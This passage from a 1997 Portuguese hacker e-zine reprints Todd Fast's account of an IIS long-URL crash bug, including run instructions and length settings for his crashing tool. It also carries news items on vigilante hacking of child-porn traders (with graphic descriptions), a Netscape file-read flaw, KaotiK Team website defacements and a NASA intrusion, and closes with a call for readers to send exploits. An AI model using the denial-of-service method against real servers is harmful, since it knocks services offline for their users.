spoke up about it doesn't mean that someone else hasn't already found or been using it. All you webmasters out there using IIS, have you had any strange crashes lately? Are you a CyberTerrorist? If so, please don't start your own CyberJihad by downloading the following program and easily reproducing this bug on any number of IIS servers all over the Internet. The Internet Worm was bad enough, and that is not my intent. I'm making this program available so that those of you running IIS can more easily assess your web server's vulnerability and whether this bug would do anything more than deny your customers service (as if that's not bad enough). Remember this program doesn't do anything special or sneaky, it just makes the job of finding the already-existing bug on a particular server somewhat easier. It does nothing that someone couldn't do in about 5 minutes with a browser anyway, so please, no hate mail from webmasters for making it available. Instead, blame Microsoft's bug. Here are the details: I created a small Java program, called IIServerSlayer, that repeatedly hits a web server with a varying length URL until the web server stops responding due to the IIS bug. To run the program, first ensure that you have Java 1.0.2 installed on your machine and running properly. Put the IIServerSlayer.class file in a directory and open a command window located at that directory. Use the following command line: java -classpath .;%classpath% IIServerSlayer We use a starting URL length of between 8200 and 8300 to crash our server, but one of our servers crashed in a much lower range of around 4000 bytes. Trial and error is the only way to determine the threshold and I suggest starting at a length of 8300. Also, don't use http:// in front of the server name; the program does that for you. One of the things to note about the program is that it can't really detect if the web request is being served properly. Because the bug doesn't always surface on the first document request with the problematic URL, the program only decrements the length counter if an error occurs, but assumes that server is about to crash if an error doesn't occur and the counter has remained the same. This means that if you start the program and don't see a series of lines like the following: Trying length xxxx...Done Trying length xxxx...Done Trying length xxxx...Done ... and instead see this: Almost dead! Retrying length xxxx...Done Almost dead! Retrying length xxxx...Done Almost dead! Retrying length xxxx...Done you have started with too low a URL length and need to Ctrl-C the program and restart it with a higher length. When the program pauses for more than a few seconds on a particular statement, you can be sure that the web server has died. When you go to the web server and clear the error, IIServerSlayer detects that the error occurred and gives you a message stating so. Download a copy of IIServerSlayer for personal, non-malicious use Chronicle Because the Internet's relevance to our existence is access to timely information, I'm posting the chronicle of my experience with this bug below in as close to real time as I can. I don't know whether it will turn out interesting or not, but there's no way to tell until I try it. 6-19-97 3:30 PM CST I contact News Editor Michael Parsons at the trade publication InfoWorld and tell him a strange story of a bug I've found in IIS that allows any remote user to shut down an IIS web server. Michael sounds keenly interested and I promise to send him additional information and the program I've written to reproduce the bug shortly. About 20 minutes later I send the email. 6-19-97 4:45 PM CST Jon P. at Microsoft calls to ask about the nature of the bug. He sounds nervous to me and wants to get straight to the point. I tell him that I'll send along the email I sent to InfoWorld along with the program. He sounds skeptical, but accepts. He seems to think that this is probably a bug Microsoft has already addressed in a service pack or a hotfix. I'm not so sure. Let's wait and see. 6-19-97 5:15 PM CST Maggie Biggs at InfoWorld calls to ask some additional questions about the bug for an upcoming news release. She says she's been able to reproduce the bug and wonders how it may affect other web services in IIS like FTP. I agree to send my program to her so she can use it to reproduce the problem. She's very friendly and helpful. 6-19-97 5:40 PM CST Maggie Biggs at InfoWorld emails to tell me she's reproduced the problem on her test machines and will be assessing the bug related to other World Wide Web services under IIS. She's stated that one of her test machines crashed altogether, a situation she's called "potentially...quite serious". 6-19-97 5:55 PM CST News is spreading like wildfire. Another journalist at InfoWorld in Seattle calls and interviews me on the phone about the nature of the bug. He asks if the bug would occur during normal usage of the server and I said it probably would not due to the length of the string. More Info? As more information on this problem comes to light, I'll post it here. Keep coming back to check out the latest news. What's with the name? I named this website after the title of this message from an old friend, upon hearing the news: "You're walking the fine line between info-terrorist and "just another guy looking to help mankind". Here's a tip: if you'd like to be labeled info-terrorist, send an e-mail to Microsoft like those Danish guys that found the Netscape security flaw. I think the e-mail actually said, "OK, where's the guy with the checkbook". Then you could adopt some crazy online name like 'LordChaos' or 'DethKing' like those Undernet software pirates do. "P.S. If this blows up and I get interviewed, you can count on me saying all kinds of awful stuff: 'He was a loner. He read Soldier of Fortune a whole lot.' Then I'd throw in a curveball to make people really wonder: 'He would get really upset whenever 'The Tick' episode was a rerun and would launch a new computer virus". I promise it's not all true. Parting Words A colleague had the good sense to remind of something I'd almost forgotten before today: You get what you pay for Copyright C 1997 by Todd Fast. All rights reserved. Contact the author, Todd Fast, at tfast@eden.com -------------------- >>18 de Junho de 1997<< IN: Cu Digest, #9.47, Wed 18 Jun 97 Date: Sun, 15 Jun 1997 14:17:01 -0700 (PDT) From: Jim Thomas Subject: File 5-- Hacker Vows 'Terror' for Child Pornographers Hacker Vows 'Terror' for Child Pornographers by Steve Silberman Source - WIRED News http://www.wired.com/news/culture/story/4437.html Copyright 1993-97 Wired Ventures, Inc. and affiliated companies After 17 years in the hacker underground, Christian Valor - well known among old-school hackers and phone phreaks as "Se7en" - was convinced that most of what gets written in the papers about computers and hacking is sensationalistic jive. For years, Valor says, he sneered at reports of the incidence of child pornography on the Net as "exaggerated/over-hyped/fearmongered/bullshit." Now making his living as a lecturer on computer security, Se7en claims he combed the Net for child pornography for eight weeks last year without finding a single image. That changed a couple of weeks ago, he says, when a JPEG mailed by an anonymous prankster sent him on an odyssey through a different kind of underground: IRC chat rooms with names like #littlegirlsex, ftp directories crammed with filenames like 6yoanal.jpg and 8&dad.jpg, and newsgroups like alt.binaries.pictures.erotica.pre-teen. The anonymous file, he says, contained a "very graphic" image of a girl "no older than 4 years old." On 8 June, Se7en vowed on a hacker's mailing list to deliver a dose of "genuine hacker terror" to those who upload and distribute such images on the Net. The debate over his methods has stirred up tough questions among his peers about civil liberties, property rights, and the ethics of vigilante justice. A declaration of war What Se7en tapped into, he says, was a "very paranoid" network of traders of preteen erotica. In his declaration of "public war" - posted to a mailing list devoted to an annual hacker's convention called DefCon - Se7en explains that the protocol on most child-porn servers is to upload selections from your own stash, in exchange for credits for more images. What he saw on those servers made him physically sick, he says. "For someone who took a virtual tour of the kiddie-porn world for only one day," he writes, "I had the opportunity to fully max out an Iomega 100-MB Zip disc." Se7en's plan to "eradicate" child-porn traders from the Net is "advocating malicious, destructive hacking against these people." He has enlisted the expertise of two fellow hackers for the first wave of attacks, which are under way. Se7en feels confident that legal authorities will look the other way when the victims of hacks are child pornographers - and he claims that a Secret Service agent told him so explicitly. Referring to a command to wipe out a hard drive by remote access, Se7en boasted, "Who are they going to run to? The police? 'They hacked my kiddie-porn server and rm -rf'd my computer!' Right." Se7en claims to have already "taken down" a "major player" - an employee of Southwestern Bell who Se7en says was "posting ads all over the place." Se7en told Wired News that he covertly watched the man's activities for days, gathering evidence that he emailed to the president of Southwestern Bell. Pseudonymous remailers like hotmail.com and juno.com, Se7en insists, provide no security blanket for traders against hackers uncovering their true identities by cracking server logs. Se7en admits the process of gaining access to the logs is time consuming, however. Even with three hackers on the case, it "can take two or three days. We don't want to hit the wrong person." A couple of days after submitting message headers and logs to the president and network administrators of Southwestern Bell, Se7en says, he got a letter saying the employee was "no longer on the payroll." The hacker search for acceptance Se7en's declaration of war received support on the original mailing list. "I am all for freedom of speech/expression," wrote one poster, "but there are some things that are just wrong.... I feel a certain moral obligation to the human race to do my part in cleaning up the evil." Federal crackdowns targeting child pornographers are ineffective, many argued. In April, FBI director Louis Freeh testified to the Senate that the bureau operation dubbed "Innocent Images" had gathered the names of nearly 4,000 suspected child-porn traffickers into its database. Freeh admitted, however, that only 83 of those cases resulted in convictions. (The Washington Times reports that there have also been two suicides.) The director's plan? Ask for more federal money to fight the "dark side of the Internet" - US$10 million. Pitching in to assist the Feds just isn't the hacker way. As one poster to the DefCon list put it, "The government can't enforce laws on the Internet. We all know that. We can enforce laws on the Internet. We all know that too." The DefCon list was not a unanimous chorus of praise for Se7en's plan to give the pornographers a taste of hacker terror, however. The most vocal dissenter has been Declan McCullagh, Washington correspondent for the Netly News. McCullagh is an outspoken champion of constitutional rights, and a former hacker himself. He says he was disturbed by hackers on the list affirming the validity of laws against child porn that he condemns as blatantly unconstitutional. "Few people seem to realize that the long-standing federal child-porn law outlawed pictures of dancing girls wearing leotards," McCullagh wrote - alluding to the conviction of Stephen Knox, a graduate student sentenced to five years in prison for possession of three videotapes of young girls in bathing suits. The camera, the US attorney general pointed out, lingered on the girls' genitals, though they remained clothed. "The sexual implications of certain modes of dress, posture, or movement may readily put the genitals on exhibition in a lascivious manner, without revealing them in a nude display," the Feds argued - and won. It's decisions like Knox v. US, and a law criminalizing completely synthetic digital images "presented as" child porn, McCullagh says, that are making the definition of child pornography unacceptably broad: a "thought crime." The menace of child porn is being exploited by "censor-happy" legislators to "rein in this unruly cyberspace," McCullagh says. The rush to revile child porn on the DefCon list, McCullagh told Wired News, reminded him of the "loyalty oaths" of the McCarthy era. "These are hackers in need of social acceptance," he says. "They've been marginalized for so long, they want to be embraced for stamping out a social evil." McCullagh knows his position is a difficult one to put across to an audience of hackers. In arguing that hackers respect the property rights of pornographers, and ponder the constitutionality of the laws they're affirming, McCullagh says, "I'm trying to convince hackers to respect the rule of law, when hacking systems is the opposite of that." But McCullagh is not alone. As the debate over Se7en's declaration spread to the cypherpunks mailing list and alt.cypherpunks - frequented by an older crowd than the DefCon list - others expressed similar reservations over Se7en's plan. "Basically, we're talking about a Dirty Harry attitude," one network technician/cypherpunk told Wired News. Though he senses "real feeling" behind Se7en's battle cry, he feels that the best way to deal with pornographers is to "turn the police loose on them." Another participant in the discussion says that while he condemns child porn as "terrible, intrinsically a crime against innocence," he questions the effectiveness of Se7en's strategy. "Killing their computer isn't going to do anything," he says, cautioning that the vigilante approach could be taken up by others. "What happens if you have somebody who doesn't like abortion? At what point are you supposed to be enforcing your personal beliefs?" Raising the paranoia level Se7en's loathing for aficionados of newsgroups like alt.sex.pedophilia.swaps runs deeper than "belief." "I myself was abused when I was a kid," Se7en told Wired News. "Luckily, I wasn't a victim of child pornography, but I know what these kids are going through." With just a few hackers working independently to crack server logs, sniff IP addresses, and sound the alarm to network administrators, he says, "We can take out one or two people a week ... and get the paranoia level up," so that "casual traders" will be frightened away from IRC rooms like "#100%preteensexfuckpics." It's not JPEGs of clothed ballerinas that raise his ire, Se7en says. It's "the 4-year-olds being raped, the 6-year-old forced to have oral sex with cum running down themselves." Such images, Se7en admits, are very rare - even in online spaces dedicated to trading sexual imagery of children. "I know what I'm doing is wrong. I'm trampling on the rights of these guys," he says. "But somewhere in the chain, someone is putting these images on paper before they get uploaded. Your freedom ends when you start hurting other people." Copyright 1993-97 Wired Ventures, Inc. and affiliated companies -------------------- >>12 de Junho de 1997<< IN: BUGTRAQ 12 Jun 97 21:56:53 CDT From: Aleph One aleph1@DFW.NET Subject: Resent mail.... Netscape NEW YORK (CNNfn) - A serious new flaw that affects all versions of Netscape Communications Corp.'s popular Navigator Internet browser software -- including the final test version of its Communicator Suite released Wednesday -- has been uncovered by a Danish software firm, CNNfn has learned. The bug was reported by Cabocomm, a software company located about 100 miles west of Copenhagen, Denmark. The bug makes it possible for Web-site operators to read anything stored on the hard drive of a PC logged on to the Web site. After the firm reported the bug to CNN Financial News, CNNfn and PC Magazine tested the bug by creating and storing a document on a PC's hard drive in New York. Seconds later, the Danish company read it. As further proof, CNNfn and PC Magazine created another document which the Danish company was also able to read. Larry Seltzer, technical director of PC Labs, was among those who helped verify the bug report. He said it would take a somewhat savvy computer user to exploit the bug. "They have to be seeking information from your system and they also have to know the file name. It's not that hard for somebody who's looking to make trouble, but they do have to be looking for it," Seltzer said. "It's serious in that it's in the [actual] browser ...whereas previous bugs generally required the user to have downloaded an additional product," Jim Wise, UNIX administrator for CNNfn, said. CNNfn's test showed that Internet security firewalls offer no protection from the bug. Mike Homer, vice president of marketing for Netscape, said the company takes this and all bug reports seriously. (83K WAV) or (83K AIFF) The Danish company says the reward of $1,000 and a T-shirt is "insultingly low" considering the extent to which the bug report is likely to worry Netscape users. Cabocomm said it would accept "reasonable compensation" for the technical information -- or they can send a Netscape representative to Cabocomm and get it for free. CNNfn, PC Magazine and the Danish company will not release technical details on the bug until Netscape has prepared a bug fix. The reason CNNfn is not reporting the specifics of the bug is to avoid anyone exploiting it. Until the bug is fixed, confidential letters, business spreadsheets -- everything on your PC -- can potentially be pilfered. The Danish company says it won't exploit the bug, but has no idea if someone else has found the same bug and is compromising a system's integrity. -------------------- >>5 de Junho de 1997<< O server www.inn.bppt.go.id foi hackado pela KaotiK Team! Mais informações em : http://kaotik.home.ml.org/timor/bppt1.html -------------------- >>2 de Junho de 1997<< IN: Cu Digest, #9.44, Tue 10 Jun 97 Date: Wed, 04 Jun 1997 22:32:06 -0400 From: "Evian S. Sim" Subject: File 2--NASA Nabs Teen Computer Hacker .c The Associated Press Monday, June 2, 1997 WASHINGTON (AP) - A Delaware teen-ager who hacked his way into a NASA web site on the Internet and left a message berating U.S. officials is being investigated by federal authorities, agency officials said Monday. NASA Inspector General Robert Gross cited the incident - the most recent example of a computer invasion of a NASA web site - as an example of how the space agency has become ``vulnerable via the Internet.'' "We live in an information environment vastly different than 20 years ago," Gross said in a written statement. "Hackers are increasing in number and in frequency of attack." In the latest case, the Delaware teen, whose name, age and hometown were not released, altered the Internet web site for the Marshall Space Flight Center in Huntsville, Ala., according to the statement from the computer crimes division of NASA's Inspector General Office. "We own you. Oh, what a tangled web we weave, when we practice to deceive," the teen's message said, adding that the government systems administrators who manage the site were "extremely stupid." The message also encouraged sympathizers of Kevin Mitnick, a notorious computer hacker, to respond to the site. Mitnick was indicted last year on charges stemming from a multimillion-dollar crime wave in cyberspace. The altered message was noticed by the computer security team in Huntsville but the NASA statement did not mention how long the message was available to the public or exactly when it was discovered. NASA officials weren't made available to answer questions about the event. In the statement, NASA called the teen's hacking "a cracking spree" and said it was stopped May 26 when his personal computer was seized. Prosecutors from the U.S. Attorney's office in Delaware and Alabama are handling the case with NASA's computer crimes division. Last March, cyberspace invaders made their way into another NASA web site and threatened an electronic terrorist attack against corporate America. The group, which called itself ``H4G1S'' in one message and ``HAGIS'' in another, also called for some well-known hackers to be released from jail. Engineers at the Goddard Space Flight Center in Greenbelt, Md., quickly noticed the change and took the page off the Internet within 30 minutes. NASA officials said the agency installed electronic security measures designed to prevent a recurrence. -------------------- >>29 de Maio de 1997<< O server www.sdn.or.id foi hackado pela KaotiK Team! Mais informações em : http://kaotik.home.ml.org/timor/bppt1.html ------------------- ******************************************************************************** Correio -------- A maioria do mail que recebemos até agora foi algo parecido com: "Eu gostava de colaborar na zine, mas não sei o que poderei fazer" RESPOSTA: by secretos Podem fazer imensas coisas!! Vou só deixar algumas ideias: - escrever um texto sobre um determinado assunto relacionado com hacking, redes ou computadores em geral; - traduzir um texto que acham que está bem elaborado e que podia servir como ponto de referencia; - mandar exploits novos para a gente os publicar; - explicar um determinado programa; - explicar um determinado bug; - responder às perguntas levantadas nesta secção pelos leitores; - enviar críticas e opiniões; - etc... Não tenham medo de escreverem algo que pensam que já toda a gente sabe. Não tenham medo de ser chamados lamers... mais lamers são aqueles que só sabem criticar!! Contamos com a vossa ajuda. ******************************************************************************** Conclusão ----------------- by secretos Ok, este foi o número 0 da .pt zine. Espero que gostem. Mas se não gostaram façam melhor, não se limitem a criticar... Dizer mal dos outros é fácil! Este número foi só um teste, queremos ver a reacção das pessoas. Esperemos que esta zine dure longos anos... Não fazemos a mínima ideia de como será o número 1 da .pt zine... Agora vamos de férias e depois a gente pensa nisso... Também não fazemos a mínima ideia de quando sairá o número 1 da .pt zine... Estejam atentos. Para próximo número da zine esperamos que vocês participem mais. ******************************************************************************** Agradecimentos ---------------- Neste número 0 da .pt zine queremos agradecer a todos aqueles que nos apoiaram: - A todos os membros da KaotiK Team (http://kaotik.home.ml.org), sem eles esta zine não teria nascido - Ao Elektro (elektro@null.net), pelos textos e pela força de vontade. - Ao secretos (secretos@hotmail.com), pelos textos e pelo design e HTML da zine. - A mais ninguém!! Mais ninguém ajudou!!!!! :-(( ******************************************************************************** ********************************************************************************